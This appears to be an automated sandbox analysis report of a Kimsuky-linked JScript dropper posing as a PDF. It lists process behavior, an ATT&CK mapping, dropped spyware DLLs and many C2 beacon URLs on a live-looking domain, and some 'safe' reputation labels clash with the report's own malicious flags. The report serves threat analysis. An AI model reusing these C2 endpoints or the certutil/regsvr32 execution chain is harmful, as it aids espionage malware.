        Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ProgramData\temp\8848.tmp VolumeInformation
        Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ProgramData\temp\1673.tmp-PowerShell_transcript.910646.c593w7K1.20210825105827.txt VolumeInformation
        Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_00007FF983DD79B0 cpuid 13_2_00007FF983DD79B0
        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
        Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_00007FF983DE31F8 GetSystemTimeAsFileTime,13_2_00007FF983DE31F8
        Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_00007FF983DD1318 _get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,13_2_00007FF983DD1318
        Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_00007FF983D91290 GetVersion,GetNativeSystemInfo,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,13_2_00007FF983D91290

        Stealing of Sensitive Information:

        barindex
        Yara detected KimsukyShow sources
        Source: Yara matchFile source: 24.2.regsvr32.exe.7ff983d00000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 13.2.regsvr32.exe.7ff983d90000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 19.2.regsvr32.exe.7ff983d00000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000018.00000002.558431847.00007FF983D01000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, type: MEMORY

        Remote Access Functionality:

        barindex
        Yara detected KimsukyShow sources
        Source: Yara matchFile source: 24.2.regsvr32.exe.7ff983d00000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 13.2.regsvr32.exe.7ff983d90000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 19.2.regsvr32.exe.7ff983d00000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000018.00000002.558431847.00007FF983D01000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, type: MEMORY

        Mitre Att&ck Matrix

        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        Replication Through Removable Media1Scripting221DLL Side-Loading1DLL Side-Loading1Deobfuscate/Decode Files or Information11OS Credential DumpingSystem Time Discovery2Replication Through Removable Media1Archive Collected Data11Exfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationData Encrypted for Impact1
        Default AccountsNative API1Application Shimming1Application Shimming1Scripting221LSASS MemoryPeripheral Device Discovery11Remote Desktop ProtocolScreen Capture1Exfiltration Over BluetoothEncrypted Channel2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        Domain AccountsPowerShell2Registry Run Keys / Startup Folder1Access Token Manipulation1Obfuscated Files or Information121Security Account ManagerFile and Directory Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationData Encoding1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Local AccountsAt (Windows)Logon Script (Mac)Process Injection111Software Packing1NTDSSystem Information Discovery24Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
        Cloud AccountsCronNetwork Logon ScriptRegistry Run Keys / Startup Folder1DLL Side-Loading1LSA SecretsQuery Registry1SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol12Manipulate Device CommunicationManipulate App Store Rankings or Ratings
        Replication Through Removable MediaLaunchdRc.commonRc.commonMasquerading111Cached Domain CredentialsSecurity Software Discovery131VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
        External Remote ServicesScheduled TaskStartup ItemsStartup ItemsVirtualization/Sandbox Evasion31DCSyncProcess Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
        Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobAccess Token Manipulation1Proc FilesystemVirtualization/Sandbox Evasion31Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
        Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Process Injection111/etc/passwd and /etc/shadowApplication Window Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
        Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Regsvr321Network SniffingRemote System Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 signatures2 2 Behavior Graph ID: 1558048 Sample: x110bx116cx1100x116dx1107x1... Startdate: 25/08/2021 Architecture: WINDOWS Score: 100 77 Multi AV Scanner detection for domain / URL 2->77 79 Multi AV Scanner detection for dropped file 2->79 81 Multi AV Scanner detection for submitted file 2->81 83 3 other signatures 2->83 10 wscript.exe 3 3 2->10         started        13 regsvr32.exe 2->13         started        15 regsvr32.exe 2->15         started        process3 signatures4 89 Suspicious powershell command line found 10->89 91 Wscript starts Powershell (via cmd or directly) 10->91 17 powershell.exe 8 10->17         started        19 powershell.exe 9 10->19         started        22 AcroRd32.exe 15 37 10->22         started        24 powershell.exe 13->24         started        process5 signatures6 26 regsvr32.exe 1 22 17->26         started        30 conhost.exe 17->30         started        87 Uses certutil -decode 19->87 32 certutil.exe 2 19->32         started        34 conhost.exe 19->34         started        36 RdrCEF.exe 4 22->36         started        38 AcroRd32.exe 3 7 22->38         started        40 conhost.exe 24->40         started        42 regsvr32.exe 24->42         started        process7 file8 71 C:\ProgramData\Software\...STCommon.dll, PE32+ 26->71 dropped 93 System process connects to network (likely due to code injection or exploit) 26->93 95 Suspicious powershell command line found 26->95 44 regsvr32.exe 1 26->44         started        47 cmd.exe 1 26->47         started        49 cmd.exe 1 26->49         started        73 C:\ProgramData\glK7UwV.pR9a, PE32+ 32->73 dropped 51 RdrCEF.exe 36->51         started        53 RdrCEF.exe 36->53         started        55 RdrCEF.exe 36->55         started        57 3 other processes 36->57 signatures9 process10 signatures11 97 Suspicious powershell command line found 44->97 59 powershell.exe 44->59         started        61 conhost.exe 47->61         started        63 conhost.exe 49->63         started        process12 process13 65 regsvr32.exe 59->65         started        69 conhost.exe 59->69         started        dnsIp14 75 texts.letterpaper.press 50.17.5.224, 49700, 49701, 49704 AMAZON-AESUS United States 65->75 85 System process connects to network (likely due to code injection or exploit) 65->85 signatures15

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.

        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        x110bx116cx1100x116dx1107x116e x1100x1161x1111x1161x11ab 2021-05-07.pdf.jse12%VirustotalBrowse
        x110bx116cx1100x116dx1107x116e x1100x1161x1111x1161x11ab 2021-05-07.pdf.jse11%ReversingLabsScript.Trojan.Heuristic

        Dropped Files

        SourceDetectionScannerLabelLink
        C:\ProgramData\Software\ESTsoft\Common\ESTCommon.dll32%MetadefenderBrowse
        C:\ProgramData\Software\ESTsoft\Common\ESTCommon.dll68%ReversingLabsWin64.Spyware.Xegumumune
        C:\ProgramData\glK7UwV.pR9a32%MetadefenderBrowse
        C:\ProgramData\glK7UwV.pR9a68%ReversingLabsWin64.Spyware.Xegumumune

        Unpacked PE Files

        No Antivirus matches

        Domains

        SourceDetectionScannerLabelLink
        texts.letterpaper.press11%VirustotalBrowse

        URLs

        SourceDetectionScannerLabelLink
        http://texts.letterpaper.press//?m=c&p1=8ace1190SL0%Avira URL Cloudsafe
        http://texts.letterpaper.press//?m=c&p1=8ace1190db;M0%Avira URL Cloudsafe
        http://texts.letterpaper.press//?m=d&p1=8ace1190xt0%Avira URL Cloudsafe
        http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69%0%Avira URL Cloudsafe
        http://texts.letterpaper.press//?m=b&p1=8ace1190&p2=c0%Avira URL Cloudsafe
        http://texts.letterpaper.press//?m=d&p1=8ace1190PO0%Avira URL Cloudsafe
        http://texts.letterpaper.press//?m=c&p1=8ace1190dbVM50%Avira URL Cloudsafe
        http://texts.letterpaper.press//?m=d&p1=8ace1190iM0%Avira URL Cloudsafe
        http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69;0%Avira URL Cloudsafe
        http://texts.letterpaper.press//?m=d&p1=8ace1190HN0%Avira URL Cloudsafe
        http://texts.letterpaper.press//?m=d&p1=8ace1190b(0%Avira URL Cloudsafe
        http://texts.letterpaper.press//?m=d&p1=8ace1190A(0%Avira URL Cloudsafe
        http://texts.letterpaper.press//?m=d&p1=8ace1190YC0%Avira URL Cloudsafe
        http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.6950%Avira URL Cloudsafe
        http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.6940%Avira URL Cloudsafe
        http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69G0%Avira URL Cloudsafe
        http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69F0%Avira URL Cloudsafe
        http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69M0%Avira URL Cloudsafe
        http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69L0%Avira URL Cloudsafe
        http://texts.letterpaper.press//?m=d&p1=8ace1190G~0%Avira URL Cloudsafe
        http://texts.letterpaper.press//?m=d&p1=8ace1190uN&0%Avira URL Cloudsafe
        http://texts.letterpaper.press//?m=d&p1=8ace1190QN0%Avira URL Cloudsafe
        http://texts.letterpaper.press//?m=d&p1=8ace1190p2=Win10.0.17134x64-S_Regsvr32-v2.0.69T0%Avira URL Cloudsafe
        http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69C0%Avira URL Cloudsafe
        http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69Y0%Avira URL Cloudsafe
        http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69W0%Avira URL Cloudsafe
        http://texts.letterpaper.press//?m=d&p1=8ace1190AC0%Avira URL Cloudsafe
        http://texts.letterpaper.press//?m=d&p1=8ace1190bm~50%Avira URL Cloudsafe
        http://texts.letterpaper.press//?m=d&p1=8ace1190bK0%Avira URL Cloudsafe
        http://texts.letterpaper.press//?m=d&p1=8ace1190bO0%Avira URL Cloudsafe
        http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69O0%Avira URL Cloudsafe
        http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69U0%Avira URL Cloudsafe
        http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69T0%Avira URL Cloudsafe
        http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69i0%Avira URL Cloudsafe
        http://texts.letterpaper.press//?m=d&p1=8ace1190O$0%Avira URL Cloudsafe
        http://texts.letterpaper.press//?m=c&p1=8ace11902M)0%Avira URL Cloudsafe
        http://texts.letterpaper.press//?m=c&p1=8ace1190b70%Avira URL Cloudsafe
        http://texts.letterpaper.press//?m=d&p1=8ace1190wP0%Avira URL Cloudsafe
        http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69k0%Avira URL Cloudsafe
        http://texts.letterpaper.press//?m=d&p1=8ace1190fb0%Avira URL Cloudsafe
        http://texts.letterpaper.press//?m=d&p1=8ace1190#~0%Avira URL Cloudsafe
        http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69e0%Avira URL Cloudsafe
        http://texts.letterpaper.press//?m=d&p1=8ace1190O-0%Avira URL Cloudsafe
        http://texts.letterpaper.press//?m=c&p1=8ace1190bK0%Avira URL Cloudsafe
        http://texts.letterpaper.press//?m=d&p1=8ace1190FN0%Avira URL Cloudsafe
        http://texts.letterpaper.press//?m=d&p1=8ace1190v~0%Avira URL Cloudsafe
        http://texts.letterpaper.press//?m=d&p1=8ace1190gM0%Avira URL Cloudsafe
        http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69z0%Avira URL Cloudsafe
        http://texts.letterpaper.press//?m=d&p1=8ace1190Mt0%Avira URL Cloudsafe
        http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69q0%Avira URL Cloudsafe
        http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69n0%Avira URL Cloudsafe
        http://texts.letterpaper.press//?m=d&p1=8ace1190_M0%Avira URL Cloudsafe
        http://texts.letterpaper.press//?m=c&p1=8ace1190bK6(0%Avira URL Cloudsafe
        http://texts.letterpaper.press//?m=d&p1=8ace1190Et0%Avira URL Cloudsafe
        http://texts.letterpaper.press//?m=d&p1=8ace1190p2=Win10.0.17134x64-S_Regsvr32-v2.0.69F0%Avira URL Cloudsafe
        http://texts.letterpaper.press//?m=c&p1=8ace1190%0%Avira URL Cloudsafe
        http://texts.letterpaper.press//?m=c&p1=8ace1190&0%Avira URL Cloudsafe
        http://texts.letterpaper.press//?m=d&p1=8ace1190bJ(0%Avira URL Cloudsafe
        http://texts.letterpaper.press//?m=d&p1=8ace11906L0%Avira URL Cloudsafe
        http://texts.letterpaper.press//?m=d&p1=8ace1190=t0%Avira URL Cloudsafe
        http://texts.letterpaper.press//?m=d&p1=8ace1190bKy(0%Avira URL Cloudsafe
        http://texts.letterpaper.press//?m=d&p1=8ace1190lN/0%Avira URL Cloudsafe
        http://texts.letterpaper.press//?m=d&p1=8ace11905t0%Avira URL Cloudsafe
        http://texts.letterpaper.press//?m=d&p1=8ace1190&M0%Avira URL Cloudsafe
        http://texts.letterpaper.press//?m=d&p1=8ace1190?L0%Avira URL Cloudsafe
        http://texts.letterpaper.press//?m=c&p1=8ace1190b$(0%Avira URL Cloudsafe
        http://texts.letterpaper.press//?m=d&p1=8ace1190csi0%Avira URL Cloudsafe
        http://texts.letterpaper.press//?m=d&p1=8ace1190qB0%Avira URL Cloudsafe
        http://texts.letterpaper.press//?m=b&p1=8ace1190&p2=cf0%Avira URL Cloudsafe
        http://texts.letterpaper.press//?m=c&p1=8ace1190I0%Avira URL Cloudsafe
        http://texts.letterpaper.press//?m=c&p1=8ace1190KP70%Avira URL Cloudsafe
        http://texts.letterpaper.press//?m=c&p1=8ace1190J0%Avira URL Cloudsafe
        http://texts.letterpaper.press//?m=c&p1=8ace1190K0%Avira URL Cloudsafe
        http://texts.letterpaper.press//?m=d&p1=8ace1190mC0%Avira URL Cloudsafe
        http://texts.letterpaper.press//?m=c&p1=8ace1190dbyLb0%Avira URL Cloudsafe
        http://texts.letterpaper.press//?m=c&p1=8ace1190sMh0%Avira URL Cloudsafe
        http://texts.letterpaper.press//?m=c&p1=8ace1190B0%Avira URL Cloudsafe
        http://texts.letterpaper.press//?m=c&p1=8ace1190K8(0%Avira URL Cloudsafe
        http://texts.letterpaper.press//?m=d&p1=8ace1190LM0%Avira URL Cloudsafe
        http://texts.letterpaper.press//?m=c&p1=8ace1190?0%Avira URL Cloudsafe
        http://texts.letterpaper.press//?m=d&p1=8ace1190db0%Avira URL Cloudsafe
        http://texts.letterpaper.press//?m=d&p1=8ace1190lO)0%Avira URL Cloudsafe
        http://texts.letterpaper.press//?m=d&p1=8ace1190v0%Avira URL Cloudsafe
        http://texts.letterpaper.press//?m=d&p1=8ace1190y0%Avira URL Cloudsafe
        http://texts.letterpaper.press//?m=d&p1=8ace1190x0%Avira URL Cloudsafe
        http://texts.letterpaper.press//?m=d&p1=8ace11900%Avira URL Cloudsafe
        http://texts.letterpaper.press//?m=c&p1=8ace119060%Avira URL Cloudsafe
        http://texts.letterpaper.press//?m=d&p1=8ace1190z0%Avira URL Cloudsafe
        http://texts.letterpaper.press//?m=d&p1=8ace1190pLk0%Avira URL Cloudsafe
        http://texts.letterpaper.press//?m=d&p1=8ace1190o0%Avira URL Cloudsafe
        http://texts.letterpaper.press//?m=c&p1=8ace119020%Avira URL Cloudsafe
        http://texts.letterpaper.press//?m=d&p1=8ace1190n0%Avira URL Cloudsafe
        http://texts.letterpaper.press//?m=c&p1=8ace11900%Avira URL Cloudsafe
        http://texts.letterpaper.press//?m=d&p1=8ace1190q0%Avira URL Cloudsafe
        http://texts.letterpaper.press//?m=d&p1=8ace1190p0%Avira URL Cloudsafe
        http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69pBm0%Avira URL Cloudsafe
        http://texts.letterpaper.press//?m=d&p1=8ace1190bt750%Avira URL Cloudsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        texts.letterpaper.press
        50.17.5.224
        truetrueunknown

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        http://texts.letterpaper.press//?m=b&p1=8ace1190&p2=ctrue
        • Avira URL Cloud: safe
        unknown
        http://texts.letterpaper.press//?m=c&p1=8ace1190true
        • Avira URL Cloud: safe
        unknown

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        http://texts.letterpaper.press//?m=c&p1=8ace1190SLregsvr32.exe, 00000021.00000003.644711545.0000000003814000.00000004.00000001.sdmptrue
        • Avira URL Cloud: safe
        unknown
        http://texts.letterpaper.press//?m=c&p1=8ace1190db;Mregsvr32.exe, 00000021.00000003.644711545.0000000003814000.00000004.00000001.sdmptrue
        • Avira URL Cloud: safe
        unknown
        http://texts.letterpaper.press//?m=d&p1=8ace1190xtregsvr32.exe, 00000021.00000003.659792484.0000000003CC7000.00000004.00000001.sdmptrue
        • Avira URL Cloud: safe
        unknown
        http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69%regsvr32.exe, 00000021.00000003.652397191.0000000003C79000.00000004.00000001.sdmptrue
        • Avira URL Cloud: safe
        unknown
        http://texts.letterpaper.press//?m=d&p1=8ace1190POregsvr32.exe, 00000021.00000003.756664899.0000000003717000.00000004.00000001.sdmptrue
        • Avira URL Cloud: safe
        unknown
        http://texts.letterpaper.press//?m=c&p1=8ace1190dbVM5regsvr32.exe, 00000021.00000003.878428282.0000000003814000.00000004.00000001.sdmptrue
        • Avira URL Cloud: safe
        unknown
        http://texts.letterpaper.press//?m=d&p1=8ace1190iMregsvr32.exe, 00000021.00000003.655249757.0000000003E0A000.00000004.00000001.sdmptrue
        • Avira URL Cloud: safe
        unknown
        http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69;regsvr32.exe, 00000021.00000003.966532472.0000000003AD5000.00000004.00000001.sdmptrue
        • Avira URL Cloud: safe
        unknown
        http://texts.letterpaper.press//?m=d&p1=8ace1190HNregsvr32.exe, 00000021.00000003.655249757.0000000003E0A000.00000004.00000001.sdmptrue
        • Avira URL Cloud: safe
        unknown
        http://texts.letterpaper.press//?m=d&p1=8ace1190b(regsvr32.exe, 00000021.00000003.658877591.0000000003C6F000.00000004.00000001.sdmptrue
        • Avira URL Cloud: safe
        unknown
        http://texts.letterpaper.press//?m=d&p1=8ace1190A(regsvr32.exe, 00000021.00000003.658877591.0000000003C6F000.00000004.00000001.sdmptrue
        • Avira URL Cloud: safe
        unknown
        http://texts.letterpaper.press//?m=d&p1=8ace1190YCregsvr32.exe, 00000021.00000003.651949010.0000000003C14000.00000004.00000001.sdmptrue
        • Avira URL Cloud: safe
        unknown
        http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.695regsvr32.exe, 00000021.00000003.652397191.0000000003C79000.00000004.00000001.sdmptrue
        • Avira URL Cloud: safe
        unknown
        http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.694regsvr32.exe, 00000021.00000003.661111972.00000000037C8000.00000004.00000001.sdmptrue
        • Avira URL Cloud: safe
        unknown
        http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69Gregsvr32.exe, 00000021.00000003.652397191.0000000003C79000.00000004.00000001.sdmptrue
        • Avira URL Cloud: safe
        unknown
        http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69Fregsvr32.exe, 00000021.00000003.864475950.00000000037CE000.00000004.00000001.sdmptrue
        • Avira URL Cloud: safe
        unknown
        http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69Mregsvr32.exe, 00000021.00000003.652397191.0000000003C79000.00000004.00000001.sdmptrue
        • Avira URL Cloud: safe
        unknown
        http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69Lregsvr32.exe, 00000021.00000003.864475950.00000000037CE000.00000004.00000001.sdmptrue
        • Avira URL Cloud: safe
        unknown
        http://texts.letterpaper.press//?m=d&p1=8ace1190G~regsvr32.exe, 00000021.00000003.661377377.0000000003722000.00000004.00000001.sdmptrue
        • Avira URL Cloud: safe
        unknown
        http://texts.letterpaper.press//?m=d&p1=8ace1190uN&regsvr32.exe, 00000021.00000003.655249757.0000000003E0A000.00000004.00000001.sdmptrue
        • Avira URL Cloud: safe
        unknown
        http://texts.letterpaper.press//?m=d&p1=8ace1190QNregsvr32.exe, 00000021.00000003.655249757.0000000003E0A000.00000004.00000001.sdmptrue
        • Avira URL Cloud: safe
        unknown
        http://texts.letterpaper.press//?m=d&p1=8ace1190p2=Win10.0.17134x64-S_Regsvr32-v2.0.69Tregsvr32.exe, 00000021.00000003.661111972.00000000037C8000.00000004.00000001.sdmptrue
        • Avira URL Cloud: safe
        unknown
        http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69Cregsvr32.exe, 00000021.00000003.652397191.0000000003C79000.00000004.00000001.sdmptrue
        • Avira URL Cloud: safe
        unknown
        http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69Yregsvr32.exe, 00000021.00000003.652397191.0000000003C79000.00000004.00000001.sdmptrue
        • Avira URL Cloud: safe
        unknown
        http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69Wregsvr32.exe, 00000021.00000003.652397191.0000000003C79000.00000004.00000001.sdmptrue
        • Avira URL Cloud: safe
        unknown
        http://texts.letterpaper.press//?m=d&p1=8ace1190ACregsvr32.exe, 00000021.00000003.651949010.0000000003C14000.00000004.00000001.sdmptrue
        • Avira URL Cloud: safe
        unknown
        http://texts.letterpaper.press//?m=d&p1=8ace1190bm~5regsvr32.exe, 00000021.00000003.661377377.0000000003722000.00000004.00000001.sdmptrue
        • Avira URL Cloud: safe
        unknown
        http://texts.letterpaper.press//?m=d&p1=8ace1190bKregsvr32.exe, 00000021.00000003.658877591.0000000003C6F000.00000004.00000001.sdmp, regsvr32.exe, 00000021.00000003.661377377.0000000003722000.00000004.00000001.sdmptrue
        • Avira URL Cloud: safe
        unknown
        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000004.00000002.452083262.0000022E20FB9000.00000004.00000001.sdmp, powershell.exe, 0000000A.00000002.496611128.000001AC8D2AF000.00000004.00000001.sdmpfalse
          high
          http://texts.letterpaper.press//?m=d&p1=8ace1190bOregsvr32.exe, 00000021.00000003.655249757.0000000003E0A000.00000004.00000001.sdmptrue
          • Avira URL Cloud: safe
          unknown
          http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69Oregsvr32.exe, 00000021.00000003.966532472.0000000003AD5000.00000004.00000001.sdmptrue
          • Avira URL Cloud: safe
          unknown
          http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69Uregsvr32.exe, 00000021.00000003.652397191.0000000003C79000.00000004.00000001.sdmptrue
          • Avira URL Cloud: safe
          unknown
